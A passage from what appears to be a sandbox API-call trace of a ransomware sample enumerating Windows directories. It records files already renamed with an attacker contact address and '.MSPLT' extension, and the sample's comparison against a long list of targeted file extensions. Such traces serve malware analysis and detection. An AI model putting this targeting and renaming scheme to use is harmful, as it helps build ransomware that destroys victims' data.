nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3948168 [0284.228] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.228] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b68346a, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b68346a, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b873622, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xf54, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0284.228] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b6ae80e, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b6ae80e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b84fa5e, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x13c66, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0284.229] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ba55c2e, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ba55c2e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5baa20bc, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0284.229] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ba55c2e, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ba55c2e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5baa20bc, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0284.229] FindClose (in: hFindFile=0x3948168 | out: hFindFile=0x3948168) returned 1 [0284.230] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0284.230] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1049", cAlternateFileName="")) returned 1 [0284.230] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0284.230] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1049\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3948168 [0284.231] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.231] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8bf9ef, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b8bf9ef, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b95876f, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xd5a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0284.231] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e98c2, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b8e98c2, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b9e31e5, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x13f46, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0284.231] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5baa20bc, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5baa20bc, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5be0f7c7, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0284.232] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5baa20bc, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5baa20bc, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5be0f7c7, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0284.232] FindClose (in: hFindFile=0x3948168 | out: hFindFile=0x3948168) returned 1 [0284.233] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0284.233] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1053", cAlternateFileName="")) returned 1 [0284.233] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0284.233] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1053\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947d28 [0284.234] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.234] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8bf9ef, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b8bf9ef, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b9320a8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1004, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0284.234] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e98c2, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b8e98c2, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ba55c2e, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x13076, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0284.235] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5bac8a6e, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5bac8a6e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5be35a54, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4658, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0284.235] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5bac8a6e, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5bac8a6e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5be35a54, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4658, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0284.235] FindClose (in: hFindFile=0x3947d28 | out: hFindFile=0x3947d28) returned 1 [0284.236] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0284.236] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1055", cAlternateFileName="")) returned 1 [0284.236] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0284.236] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1055\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x39480a8 [0284.237] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.237] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b95876f, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b95876f, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bea7fff, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1004, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0284.238] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c071cfd, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c071cfd, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c097f88, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x12d16, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0284.238] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5bf66e68, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5bf66e68, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bf66e68, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4658, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0284.238] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5bf66e68, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5bf66e68, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bf66e68, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4658, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0284.238] FindClose (in: hFindFile=0x39480a8 | out: hFindFile=0x39480a8) returned 1 [0284.239] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0284.239] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="2052", cAlternateFileName="")) returned 1 [0284.239] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0284.239] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2052\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x39481a8 [0284.240] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.241] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ba0974a, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ba0974a, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bfd9334, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x17b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0284.241] lstrlenW (lpString="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT") returned 52 [0284.241] lstrlenW (lpString=".1cd") returned 4 [0284.241] lstrcmpiW (lpString1=".1cd", lpString2="SPLT") returned -1 [0284.241] lstrlenW (lpString=".3ds") returned 4 [0284.241] lstrcmpiW (lpString1=".3ds", lpString2="SPLT") returned -1 [0284.241] lstrlenW (lpString=".3fr") returned 4 [0284.241] lstrcmpiW (lpString1=".3fr", lpString2="SPLT") returned -1 [0284.241] lstrlenW (lpString=".3g2") returned 4 [0284.241] lstrcmpiW (lpString1=".3g2", lpString2="SPLT") returned -1 [0284.241] lstrlenW (lpString=".3gp") returned 4 [0284.241] lstrcmpiW (lpString1=".3gp", lpString2="SPLT") returned -1 [0284.241] lstrlenW (lpString=".7z") returned 3 [0284.241] lstrcmpiW (lpString1=".7z", lpString2="PLT") returned -1 [0284.241] lstrlenW (lpString=".accda") returned 6 [0284.241] lstrcmpiW (lpString1=".accda", lpString2=".MSPLT") returned -1 [0284.241] lstrlenW (lpString=".accdb") returned 6 [0284.241] lstrcmpiW (lpString1=".accdb", lpString2=".MSPLT") returned -1 [0284.241] lstrlenW (lpString=".accdc") returned 6 [0284.241] lstrcmpiW (lpString1=".accdc", lpString2=".MSPLT") returned -1 [0284.241] lstrlenW (lpString=".accde") returned 6 [0284.241] lstrcmpiW (lpString1=".accde", lpString2=".MSPLT") returned -1 [0284.241] lstrlenW (lpString=".accdt") returned 6 [0284.241] lstrcmpiW (lpString1=".accdt", lpString2=".MSPLT") returned -1 [0284.242] lstrlenW (lpString=".accdw") returned 6 [0284.242] lstrcmpiW (lpString1=".accdw", lpString2=".MSPLT") returned -1 [0284.242] lstrlenW (lpString=".adb") returned 4 [0284.242] lstrcmpiW (lpString1=".adb", lpString2="SPLT") returned -1 [0284.242] lstrlenW (lpString=".adp") returned 4 [0284.242] lstrcmpiW (lpString1=".adp", lpString2="SPLT") returned -1 [0284.242] lstrlenW (lpString=".ai") returned 3 [0284.242] lstrcmpiW (lpString1=".ai", lpString2="PLT") returned -1 [0284.242] lstrlenW (lpString=".ai3") returned 4 [0284.242] lstrcmpiW (lpString1=".ai3", lpString2="SPLT") returned -1 [0284.242] lstrlenW (lpString=".ai4") returned 4 [0284.242] lstrcmpiW (lpString1=".ai4", lpString2="SPLT") returned -1 [0284.242] lstrlenW (lpString=".ai5") returned 4 [0284.242] lstrcmpiW (lpString1=".ai5", lpString2="SPLT") returned -1 [0284.242] lstrlenW (lpString=".ai6") returned 4 [0284.242] lstrcmpiW (lpString1=".ai6", lpString2="SPLT") returned -1 [0284.242] lstrlenW (lpString=".ai7") returned 4 [0284.242] lstrcmpiW (lpString1=".ai7", lpString2="SPLT") returned -1 [0284.242] lstrlenW (lpString=".ai8") returned 4 [0284.242] lstrcmpiW (lpString1=".ai8", lpString2="SPLT") returned -1 [0284.242] lstrlenW (lpString=".anim") returned 5 [0284.242] lstrcmpiW (lpString1=".anim", lpString2="MSPLT") returned -1 [0284.242] lstrlenW (lpString=".arw") returned 4 [0284.242] lstrcmpiW (lpString1=".arw", lpString2="SPLT") returned -1 [0284.242] lstrlenW (lpString=".as") returned 3 [0284.242] lstrcmpiW (lpString1=".as", lpString2="PLT") returned -1 [0284.242] lstrlenW (lpString=".asa") returned 4 [0284.242] lstrcmpiW (lpString1=".asa", lpString2="SPLT") returned -1 [0284.242] lstrlenW (lpString=".asc") returned 4 [0284.243] lstrcmpiW (lpString1=".asc", lpString2="SPLT") returned -1 [0284.243] lstrlenW (lpString=".ascx") returned 5 [0284.243] lstrcmpiW (lpString1=".ascx", lpString2="MSPLT") returned -1 [0284.243] lstrlenW (lpString=".asm") returned 4 [0284.243] lstrcmpiW (lpString1=".asm", lpString2="SPLT") returned -1 [0284.243] lstrlenW (lpString=".asmx") returned 5 [0284.243] lstrcmpiW (lpString1=".asmx", lpString2="MSPLT") returned -1 [0284.243] lstrlenW (lpString=".asp") returned 4 [0284.243] lstrcmpiW (lpString1=".asp", lpString2="SPLT") returned -1 [0284.243] lstrlenW (lpString=".aspx") returned 5 [0284.243] lstrcmpiW (lpString1=".aspx", lpString2="MSPLT") returned -1 [0284.243] lstrlenW (lpString=".asr") returned 4 [0284.243] lstrcmpiW (lpString1=".asr", lpString2="SPLT") returned -1 [0284.243] lstrlenW (lpString=".asx") returned 4 [0284.243] lstrcmpiW (lpString1=".asx", lpString2="SPLT") returned -1 [0284.243] lstrlenW (lpString=".avi") returned 4 [0284.243] lstrcmpiW (lpString1=".avi", lpString2="SPLT") returned -1 [0284.243] lstrlenW (lpString=".avs") returned 4 [0284.243] lstrcmpiW (lpString1=".avs", lpString2="SPLT") returned -1 [0284.243] lstrlenW (lpString=".backup") returned 7 [0284.243] lstrcmpiW (lpString1=".backup", lpString2="].MSPLT") returned -1 [0284.243] lstrlenW (lpString=".bak") returned 4 [0284.243] lstrcmpiW (lpString1=".bak", lpString2="SPLT") returned -1 [0284.243] lstrlenW (lpString=".bay") returned 4 [0284.243] lstrcmpiW (lpString1=".bay", lpString2="SPLT") returned -1 [0284.243] lstrlenW (lpString=".bd") returned 3 [0284.243] lstrcmpiW (lpString1=".bd", lpString2="PLT") returned -1 [0284.243] lstrlenW (lpString=".bin") returned 4 [0284.243] lstrcmpiW (lpString1=".bin", lpString2="SPLT") returned -1 [0284.243] lstrlenW (lpString=".bmp") returned 4 [0284.244] lstrcmpiW (lpString1=".bmp", lpString2="SPLT") returned -1 [0284.244] lstrlenW (lpString=".bz2") returned 4 [0284.244] lstrcmpiW (lpString1=".bz2", lpString2="SPLT") returned -1 [0284.244] lstrlenW (lpString=".c") returned 2 [0284.244] lstrcmpiW (lpString1=".c", lpString2="LT") returned -1 [0284.244] lstrlenW (lpString=".cdr") returned 4 [0284.244] lstrcmpiW (lpString1=".cdr", lpString2="SPLT") returned -1 [0284.244] lstrlenW (lpString=".cer") returned 4 [0284.244] lstrcmpiW (lpString1=".cer", lpString2="SPLT") returned -1 [0284.244] lstrlenW (lpString=".cf") returned 3 [0284.244] lstrcmpiW (lpString1=".cf", lpString2="PLT") returned -1 [0284.244] lstrlenW (lpString=".cfc") returned 4 [0284.244] lstrcmpiW (lpString1=".cfc", lpString2="SPLT") returned -1 [0284.244] lstrlenW (lpString=".cfm") returned 4 [0284.244] lstrcmpiW (lpString1=".cfm", lpString2="SPLT") returned -1 [0284.244] lstrlenW (lpString=".cfml") returned 5 [0284.244] lstrcmpiW (lpString1=".cfml", lpString2="MSPLT") returned -1 [0284.244] lstrlenW (lpString=".cfu") returned 4 [0284.244] lstrcmpiW (lpString1=".cfu", lpString2="SPLT") returned -1 [0284.244] lstrlenW (lpString=".chm") returned 4 [0284.244] lstrcmpiW (lpString1=".chm", lpString2="SPLT") returned -1 [0284.244] lstrlenW (lpString=".cin") returned 4 [0284.244] lstrcmpiW (lpString1=".cin", lpString2="SPLT") returned -1 [0284.244] lstrlenW (lpString=".class") returned 6 [0284.244] lstrcmpiW (lpString1=".class", lpString2=".MSPLT") returned -1 [0284.244] lstrlenW (lpString=".clx") returned 4 [0284.245] lstrcmpiW (lpString1=".clx", lpString2="SPLT") returned -1 [0284.245] lstrlenW (lpString=".config") returned 7 [0284.245] lstrcmpiW (lpString1=".config", lpString2="].MSPLT") returned -1 [0284.245] lstrlenW (lpString=".cpp") returned 4 [0284.245] lstrcmpiW (lpString1=".cpp", lpString2="SPLT") returned -1 [0284.245] lstrlenW (lpString=".cr2") returned 4 [0284.245] lstrcmpiW (lpString1=".cr2", lpString2="SPLT") returned -1 [0284.245] lstrlenW (lpString=".crt") returned 4 [0284.245] lstrcmpiW (lpString1=".crt", lpString2="SPLT") returned -1 [0284.245] lstrlenW (lpString=".crw") returned 4 [0284.245] lstrcmpiW (lpString1=".crw", lpString2="SPLT") returned -1 [0284.245] lstrlenW (lpString=".cs") returned 3 [0284.245] lstrcmpiW (lpString1=".cs", lpString2="PLT") returned -1 [0284.245] lstrlenW (lpString=".css") returned 4 [0284.245] lstrcmpiW (lpString1=".css", 